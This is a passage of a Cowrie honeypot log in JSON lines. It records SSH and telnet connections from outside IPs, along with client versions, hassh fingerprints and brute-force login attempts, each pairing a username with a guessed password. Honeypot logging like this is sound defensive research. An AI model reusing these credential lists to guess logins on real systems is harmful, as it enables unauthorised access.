2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:14:59.211389Z","src_ip":"212.227.235.229","session":"8dde47c0365f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:15:00.204111Z","src_ip":"212.227.235.229","session":"8dde47c0365f"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:15:00.455415Z","src_ip":"212.227.235.229","session":"8dde47c0365f"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:15:00.458959Z","src_ip":"212.227.235.229","session":"538752abfd29"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":48178,"dst_ip":"1.2.3.4","dst_port":22,"session":"5668b45e64f1","protocol":"ssh","message":"New connection: 217.154.1.158:48178 (1.2.3.4:22) [session: 5668b45e64f1]","sensor":"my-vps","timestamp":"2025-08-26T19:15:03.636429Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:15:03.637298Z","src_ip":"217.154.1.158","session":"5668b45e64f1"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T19:15:03.651724Z","src_ip":"217.154.1.158","session":"5668b45e64f1"}
{"eventid":"cowrie.session.closed","duration":12.393122673034668,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:15:06.639598Z","src_ip":"212.227.235.229","session":"81c1ae37d584"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41558,"dst_ip":"1.2.3.4","dst_port":22,"session":"c40abd9c51b3","protocol":"ssh","message":"New connection: 212.227.235.229:41558 (1.2.3.4:22) [session: c40abd9c51b3]","sensor":"my-vps","timestamp":"2025-08-26T19:15:08.410347Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:15:08.412053Z","src_ip":"212.227.235.229","session":"c40abd9c51b3"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:15:11.637513Z","src_ip":"217.154.1.158","session":"5668b45e64f1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":30921,"dst_ip":"1.2.3.4","dst_port":22,"session":"323fd4233e63","protocol":"ssh","message":"New connection: 212.227.235.229:30921 (1.2.3.4:22) [session: 323fd4233e63]","sensor":"my-vps","timestamp":"2025-08-26T19:15:14.855430Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T19:15:14.856424Z","src_ip":"212.227.235.229","session":"323fd4233e63"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T19:15:14.984373Z","src_ip":"212.227.235.229","session":"323fd4233e63"}
{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:15:15.298042Z","src_ip":"212.227.235.229","session":"c40abd9c51b3"}
{"eventid":"cowrie.login.failed","username":"joyce","password":"7777777","message":"login attempt [joyce/7777777] failed","sensor":"my-vps","timestamp":"2025-08-26T19:15:15.583583Z","src_ip":"212.227.235.229","session":"323fd4233e63"}
{"eventid":"cowrie.login.failed","username":"joyce","password":"abc123","message":"login attempt [joyce/abc123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:15:16.714204Z","src_ip":"212.227.235.229","session":"323fd4233e63"}
{"eventid":"cowrie.login.failed","username":"joyce","password":"abcd123","message":"login attempt [joyce/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:15:17.845323Z","src_ip":"212.227.235.229","session":"323fd4233e63"}
{"eventid":"cowrie.login.failed","username":"joyce","password":"abcd1234","message":"login attempt [joyce/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-26T19:15:18.975691Z","src_ip":"212.227.235.229","session":"323fd4233e63"}
{"eventid":"cowrie.login.failed","username":"joyce","password":"abc1234","message":"login attempt [joyce/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-26T19:15:20.106394Z","src_ip":"212.227.235.229","session":"323fd4233e63"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:15:21.238277Z","src_ip":"212.227.235.229","session":"323fd4233e63"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":40804,"dst_ip":"1.2.3.4","dst_port":22,"session":"dea56b0749c3","protocol":"ssh","message":"New connection: 45.88.8.186:40804 (1.2.3.4:22) [session: dea56b0749c3]","sensor":"my-vps","timestamp":"2025-08-26T19:15:47.865334Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:15:48.564916Z","src_ip":"45.88.8.186","session":"dea56b0749c3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:15:48.565675Z","src_ip":"45.88.8.186","session":"dea56b0749c3"}
{"eventid":"cowrie.login.success","username":"root","password":"Password123!","message":"login attempt [root/Password123!] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:15:51.140197Z","src_ip":"45.88.8.186","session":"dea56b0749c3"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:15:51.783221Z","src_ip":"45.88.8.186","session":"dea56b0749c3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33929,"dst_ip":"1.2.3.4","dst_port":22,"session":"3299b2aa6518","protocol":"ssh","message":"New connection: 212.227.235.229:33929 (1.2.3.4:22) [session: 3299b2aa6518]","sensor":"my-vps","timestamp":"2025-08-26T19:16:00.890393Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:16:00.900501Z","src_ip":"212.227.235.229","session":"3299b2aa6518"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:16:01.149179Z","src_ip":"212.227.235.229","session":"3299b2aa6518"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"Aa123456!","message":"login attempt [ubuntu/Aa123456!] failed","sensor":"my-vps","timestamp":"2025-08-26T19:16:02.159271Z","src_ip":"212.227.235.229","session":"3299b2aa6518"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:16:03.416404Z","src_ip":"212.227.235.229","session":"3299b2aa6518"}
{"eventid":"cowrie.session.connect","src_ip":"60.17.103.97","src_port":49099,"dst_ip":"1.2.3.4","dst_port":23,"session":"5d8ee6a8e67e","protocol":"telnet","message":"New connection: 60.17.103.97:49099 (1.2.3.4:23) [session: 5d8ee6a8e67e]","sensor":"my-vps","timestamp":"2025-08-26T19:16:08.216254Z"}
{"eventid":"cowrie.session.closed","duration":14.327440023422241,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:16:22.543620Z","src_ip":"60.17.103.97","session":"5d8ee6a8e67e"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:16:23.659246Z","src_ip":"212.227.235.229","session":"7891c860eef0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37592,"dst_ip":"1.2.3.4","dst_port":22,"session":"771bee86a085","protocol":"ssh","message":"New connection: 212.227.235.229:37592 (1.2.3.4:22) [session: 771bee86a085]","sensor":"my-vps","timestamp":"2025-08-26T19:16:44.076974Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:16:44.077972Z","src_ip":"212.227.235.229","session":"771bee86a085"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:16:48.956253Z","src_ip":"212.227.235.229","session":"771bee86a085"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46623,"dst_ip":"1.2.3.4","dst_port":22,"session":"818f941077de","protocol":"ssh","message":"New connection: 212.227.235.229:46623 (1.2.3.4:22) [session: 818f941077de]","sensor":"my-vps","timestamp":"2025-08-26T19:17:10.561044Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:17:10.570779Z","src_ip":"212.227.235.229","session":"818f941077de"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:17:10.821006Z","src_ip":"212.227.235.229","session":"818f941077de"}
{"eventid":"cowrie.login.failed","username":"sql","password":"123","message":"login attempt [sql/123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:17:11.840758Z","src_ip":"212.227.235.229","session":"818f941077de"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:17:13.102955Z","src_ip":"212.227.235.229","session":"818f941077de"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":61928,"dst_ip":"1.2.3.4","dst_port":22,"session":"08fa76c8114a","protocol":"ssh","message":"New connection: 212.227.125.160:61928 (1.2.3.4:22) [session: 08fa76c8114a]","sensor":"my-vps","timestamp":"2025-08-26T19:17:20.375962Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T19:17:20.376769Z","src_ip":"212.227.125.160","session":"08fa76c8114a"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T19:17:20.462315Z","src_ip":"212.227.125.160","session":"08fa76c8114a"}
{"eventid":"cowrie.login.failed","username":"justine","password":"justine","message":"login attempt [justine/justine] failed","sensor":"my-vps","timestamp":"2025-08-26T19:17:20.883472Z","src_ip":"212.227.125.160","session":"08fa76c8114a"}
{"eventid":"cowrie.login.failed","username":"justine","password":"justine1","message":"login attempt [justine/justine1] failed","sensor":"my-vps","timestamp":"2025-08-26T19:17:21.971051Z","src_ip":"212.227.125.160","session":"08fa76c8114a"}
{"eventid":"cowrie.login.failed","username":"justine","password":"justine123","message":"login attempt [justine/justine123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:17:23.058139Z","src_ip":"212.227.125.160","session":"08fa76c8114a"}
{"eventid":"cowrie.login.failed","username":"justine","password":"justine1234","message":"login attempt [justine/justine1234] failed","sensor":"my-vps","timestamp":"2025-08-26T19:17:24.145101Z","src_ip":"212.227.125.160","session":"08fa76c8114a"}
{"eventid":"cowrie.login.failed","username":"justine","password":"justine12345","message":"login attempt [justine/justine12345] failed","sensor":"my-vps","timestamp":"2025-08-26T19:17:25.232800Z","src_ip":"212.227.125.160","session":"08fa76c8114a"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":33423,"dst_ip":"1.2.3.4","dst_port":22,"session":"c626611deb37","protocol":"ssh","message":"New connection: 80.94.95.15:33423 (1.2.3.4:22) [session: c626611deb37]","sensor":"my-vps","timestamp":"2025-08-26T19:17:26.239133Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T19:17:26.239733Z","src_ip":"80.94.95.15","session":"c626611deb37"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T19:17:26.306171Z","src_ip":"80.94.95.15","session":"c626611deb37"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:17:26.320178Z","src_ip":"212.227.125.160","session":"08fa76c8114a"}
{"eventid":"cowrie.login.failed","username":"user","password":"polo","message":"login attempt [user/polo] failed","sensor":"my-vps","timestamp":"2025-08-26T19:17:26.649742Z","src_ip":"80.94.95.15","session":"c626611deb37"}
{"eventid":"cowrie.login.failed","username":"user","password":"oblivion","message":"login attempt [user/oblivion] failed","sensor":"my-vps","timestamp":"2025-08-26T19:17:27.718097Z","src_ip":"80.94.95.15","session":"c626611deb37"}
{"eventid":"cowrie.login.failed","username":"user","password":"mustangs","message":"login attempt [user/mustangs] failed","sensor":"my-vps","timestamp":"2025-08-26T19:17:28.786745Z","src_ip":"80.94.95.15","session":"c626611deb37"}
{"eventid":"cowrie.login.failed","username":"user","password":"margarita","message":"login attempt [user/margarita] failed","sensor":"my-vps","timestamp":"2025-08-26T19:17:29.865495Z","src_ip":"80.94.95.15","session":"c626611deb37"}
{"eventid":"cowrie.login.failed","username":"user","password":"letsgo","message":"login attempt [user/letsgo] failed","sensor":"my-vps","timestamp":"2025-08-26T19:17:30.936662Z","src_ip":"80.94.95.15","session":"c626611deb37"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:17:32.007707Z","src_ip":"80.94.95.15","session":"c626611deb37"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58728,"dst_ip":"1.2.3.4","dst_port":22,"session":"f224dae2081d","protocol":"ssh","message":"New connection: 212.227.235.229:58728 (1.2.3.4:22) [session: f224dae2081d]","sensor":"my-vps","timestamp":"2025-08-26T19:17:35.160956Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:17:35.162096Z","src_ip":"212.227.235.229","session":"f224dae2081d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59111,"dst_ip":"1.2.3.4","dst_port":22,"session":"15dd1b2cf8ae","protocol":"ssh","message":"New connection: 212.227.235.229:59111 (1.2.3.4:22) [session: 15dd1b2cf8ae]","sensor":"my-vps","timestamp":"2025-08-26T19:17:35.315408Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:17:35.316143Z","src_ip":"212.227.235.229","session":"15dd1b2cf8ae"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 